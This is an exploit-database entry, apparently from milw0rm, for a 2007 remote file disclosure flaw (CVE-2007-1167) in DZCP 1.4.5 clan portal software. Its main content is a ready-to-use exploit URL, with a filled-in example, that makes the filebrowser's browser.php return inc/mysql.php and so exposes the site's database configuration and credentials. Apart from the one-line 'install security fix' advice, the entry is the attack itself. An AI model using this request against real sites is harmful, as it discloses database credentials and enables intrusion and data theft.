DZCP (deV!L_z Clanportal) 1.4.5 - Remote File Disclosure



EKU-ID: 11335 CVE: OSVDB-33372;CVE-2007-1167 OSVDB-ID:
Author: Kiba Published: 2007-02-21 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


# DZCP (Devilz Clanportal) <= 1.4.5 Mysql Data viewable
# Found by: Kiba
# Solution: Install security Fix!
# Exploit:

http://[SITE]/[PATH]/inc/filebrowser/browser.php?file=inc/mysql.php

Example: http://www.example.com/dzcp/inc/filebrowser/browser.php?file=inc/mysql.php

# milw0rm.com [2007-02-21]